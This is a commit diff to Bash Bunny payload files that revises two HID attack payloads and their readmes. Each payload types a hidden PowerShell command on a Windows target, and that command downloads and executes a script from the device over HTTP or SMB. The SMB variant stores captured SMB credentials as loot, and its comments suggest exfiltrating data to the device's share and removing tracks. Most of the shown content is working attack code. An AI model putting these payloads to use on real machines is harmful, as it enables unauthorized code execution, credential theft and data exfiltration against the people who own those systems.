cleaned up and extended

2017-10-11 11:42:03 -05:00 · 2017-10-11 11:42:03 -05:00 · 91c7c2276f
parent c0ab8d3e88
commit 91c7c2276f
6 changed files with 55 additions and 53 deletions
--- a/payloads/library/execution/psh_DownloadExec/psh.txt
+++ b/payloads/library/execution/psh_DownloadExec/psh.txt
--- a/payloads/library/execution/psh_DownloadExec/payload.txt
+++ b/payloads/library/execution/psh_DownloadExec/payload.txt
@ -8,7 +8,8 @@
 # Attackmodes:   HID, RNDIS_ETHERNET
 # Firmware:      >= 1.3
 #
-# Quick HID attack to retrieve and run powershell payload from BashBunny web server - ensure psh.txt exists in payload directory
+# Quick HID attack to retrieve and run powershell payload from BashBunny web server
+# ensure p.txt (your powershell payload) exists in payload directory
 # 
 # | Attack Stage        | Description                              |
 # | ------------------- | ---------------------------------------- |
@ -18,41 +19,38 @@

 ATTACKMODE RNDIS_ETHERNET HID
 LED SETUP
+REQUIRETOOL gohttp

 GET HOST_IP
 GET SWITCH_POSITION

-# Set working dir
-PAYLOAD_DIR=/root/udisk/payloads/$SWITCH_POSITION
-SERVER_LOG=$PAYLOAD_DIR/server.log
+# DEFINE DIRECTORIES
+PAYLOAD_DIR=/root/udisk/payloads/${SWITCH_POSITION}
+SERVER_LOG=/tmp/server.log

-# Fresh Server Log
-rm -f $SERVER_LOG
+# SERVER LOG
+rm -f ${SERVER_LOG}

-# Check for gohttp
-REQUIRETOOL gohttp
-
-# Start web server
+# START HTTP SERVER
 iptables -A OUTPUT -p udp --dport 53 -j DROP # disallow outgoing dns requests so server starts immediately
-/usr/bin/gohttp -p 80 -d $PAYLOAD_DIR  > $SERVER_LOG 2>&1 &
+/tools/gohttp/gohttp -p 80 -d /tmp/ > ${SERVER_LOG} 2>&1 &

-# Check for psh.txt
-if [ ! -f $PAYLOAD_DIR/psh.txt ]; then
+# CHECK FOR POWERSHELL
+if [ ! -f ${PAYLOAD_DIR}/p.txt ]; then
    LED FAIL2
    exit 1
 fi
+cp -R ${PAYLOAD_DIR}/* /tmp/ # any additional assets will be available in tmp

-# Attack HID
+# STAGE 1 - POWERSHELL
 LED STAGE1

-# Attack (abbreviations to allow run execution)
-RUN WIN "powershell -WindowStyle Hidden \"\$web=New-Object Net.WebClient;while (\$TRUE) {If ((New-Object net.sockets.tcpclient ('$HOST_IP','80')).Connected) {iex \$web.DownloadString('http://$HOST_IP/psh.txt');\$web.DownloadString('http://172.16.64.1/DONE');exit}}\""
+RUN WIN "powershell -WindowStyle Hidden \"\$web=New-Object Net.WebClient;while (\$TRUE) {If ((New-Object net.sockets.tcpclient ('${HOST_IP}','80')).Connected) {iex \$web.DownloadString('http://${HOST_IP}/p.txt');\$web.DownloadString('http://172.16.64.1/DONE');exit}}\""
 # Remove tracks in the psh payload if you wish

-# Attack Ethernet
+# STAGE 2 - WAIT
 LED STAGE2
-
-while ! grep -Fq "GET \"/DONE\"" $SERVER_LOG; do
+while ! grep -Fq "GET \"/DONE\"" ${SERVER_LOG}; do
    sleep .5
 done

--- a/payloads/library/execution/psh_DownloadExec/readme.md
+++ b/payloads/library/execution/psh_DownloadExec/readme.md
@ -14,7 +14,7 @@ Quick HID attack to retrieve and run powershell payload from BashBunny web serve

 ## Configuration

-Ensure psh.txt exists in payload directory. This is the powershell script that will be downloaded and executed.
+Ensure p.txt exists in payload directory. This is the powershell script that will be downloaded and executed.

 ## Requirements

--- a/payloads/library/execution/psh_DownloadExecSMB/psh.txt
+++ b/payloads/library/execution/psh_DownloadExecSMB/psh.txt
--- a/payloads/library/execution/psh_DownloadExecSMB/payload.txt
+++ b/payloads/library/execution/psh_DownloadExecSMB/payload.txt
@ -2,23 +2,23 @@
 #
 # Title:         Powershell Download and Execute SMB
 # Author:        LowValueTarget
-# Version:       1.2
+# Version:       2.0
 # Category:      Powershell
 # Target:        Windows XP SP3+ (Powershell)
 # Attackmodes:   HID, RNDIS_ETHERNET
 # Firmware:      >= 1.2
 #
-# Quick HID attack to retrieve and run powershell payload from BashBunny SMBServer. Credentials are stored as loot.  
-# Ensure psh.txt exists in payload directory  
+# Quick HID attack to retrieve and run powershell payload from BashBunny SMBServer. Possibilities are limitless!
+# Credentials captured by  are stored as loot.  
+# Ensure p.txt exists in payload directory  (using .txt instead of .ps1 in case of security countermeasures)
 #
-# Requires Impacket is installed (python ./impacket/setup.py install)  
+# Required tools: impacket 
 #
 # | Attack Stage        | Description                   |
 # | ------------------- | ------------------------------|
 # | Stage 1             | Powershell                    |
 # | Stage 2             | Delivering powershell payload |
 #
-
 ATTACKMODE RNDIS_ETHERNET HID

 # SETUP
@ -29,48 +29,48 @@ GET SWITCH_POSITION
 GET TARGET_HOSTNAME
 GET HOST_IP

+# DEFINE DIRECTORIES
 PAYLOAD_DIR=/root/udisk/payloads/$SWITCH_POSITION
-# Check for psh.txt
-if [ ! -f ${PAYLOAD_DIR}/psh.txt ]; then
+LOOTDIR_BB=/root/udisk/loot/psh_DownloadExecSMB
+
+mkdir -p /tmp/{l,p}
+
+# CHECK FOR POWERSHELL
+if [ ! -f ${PAYLOAD_DIR}/p.txt ]; then
    LED FAIL
    exit 1
 fi
-cp -R ${PAYLOAD_DIR}/* /tmp/
+cp -R ${PAYLOAD_DIR}/* /tmp/p/ # any additional assets will be available in tmp

-LOOTDIR=/root/udisk/loot/psh_DownloadExecSMB
-# Setup named logs in loot directory
-mkdir -p ${LOOTDIR}
+# GET HOSTNAME
 HOST=${TARGET_HOSTNAME}
-# If hostname is blank set it to "noname"
-[[ -z "$HOST" ]] && HOST="noname"
-COUNT=$(ls -lad ${LOOTDIR}/$HOST* | wc -l)
+[[ -z "${HOST}" ]] && HOST="noname"
+COUNT=$(ls -lad ${LOOTDIR_BB}/${HOST}* | wc -l)
 COUNT=$((COUNT+1))
-mkdir -p ${LOOTDIR}/${HOST}-$COUNT
+mkdir -p ${LOOTDIR_BB}/${HOST}-${COUNT}
+LOOTDIR_BB=${LOOTDIR_BB}/${HOST}-${COUNT}

-# Log file
-LOGFILE=psh_smb.log
+# START SMB SERVER
+LOGFILE=/tmp/l/psh_downloadsmb.log
+touch ${LOGFILE}
+python /tools/impacket/examples/smbserver.py -comment 'Public Share' s /tmp > ${LOGFILE} &

-# Start SMB Server
-mkdir -p /loot
-python /tools/impacket/examples/smbserver.py -comment 'Public Share' s /tmp/ > /loot/${LOGFILE} &
-
-# STAGE 1 - Powershell
+# STAGE 1 - POWERSHELL
 LED STAGE1
+RUN WIN "powershell -WindowStyle Hidden \"while (\$true) {If ((New-Object net.sockets.tcpclient(${HOST_IP},445)).Connected) {iex (New-Object Net.WebClient).DownloadString('\\\\${HOST_IP}\\s\\p\\p.txt');New-Item \\\\${HOST_IP}\\s\\COMPLETE -ItemType file;exit}}\""
+# TIP: To exfil any data, upload to \\172.16.64.1\s\l\ -- this will be copied to the BB as loot
+# TIP: Remove tracks in the psh payload if you wish

-RUN WIN "powershell -WindowStyle Hidden \"while (\$true) { If ((New-Object net.sockets.tcpclient ($HOST_IP,445)).Connected) { iex (New-Object Net.WebClient).DownloadString('\\\\$HOST_IP\\s\\psh.txt');New-Item \\\172.16.64.1\\s\\COMPLETE -ItemType file;exit}}\""
-# Remove tracks in the psh payload if you wish
-
-# STAGE 2 - Wait until payload retrieved
-# Wait until payload is retrieved
+# STAGE 2 - HURRY UP AND WAIT
 LED STAGE2
 while ! [ -f /tmp/COMPLETE ]; do sleep 0.5; done

 # CLEANUP
 LED CLEANUP

-# Move loot to mass storage
-mv /loot/${LOGFILE} ${LOOTDIR}/${HOST}-$COUNT
-rm /loot/${LOGFILE}
+# STASH THE LOOT
+mv /tmp/l/* ${LOOTDIR_BB}/
+rm -rf /tmp/{l,p}
 # Sync file system
 sync

--- a/payloads/library/execution/psh_DownloadExecSMB/readme.md
+++ b/payloads/library/execution/psh_DownloadExecSMB/readme.md
@ -10,12 +10,16 @@

 ## Description

-Quick HID attack to retrieve and run powershell payload from BashBunny SMBServer. Credentials are stored as loot.  
+Quick HID attack to retrieve and run powershell payload from BashBunny SMBServer. SMB Credentials are stored as loot.  

 ## Configuration

-* Ensure psh.txt exists in payload directory. This is the powershell script that will be downloaded and executed.  
-* Requires Impacket is installed (python ./impacket/setup.py install)  
+* Ensure p.txt exists in payload directory. This is the powershell script that will be downloaded and executed.  
+* Requires Impacket
+
+__Installation__
+
+See Hak5's Tool Thread Here: https://forums.hak5.org/index.php?/topic/40971-info-tools/

 ## STATUS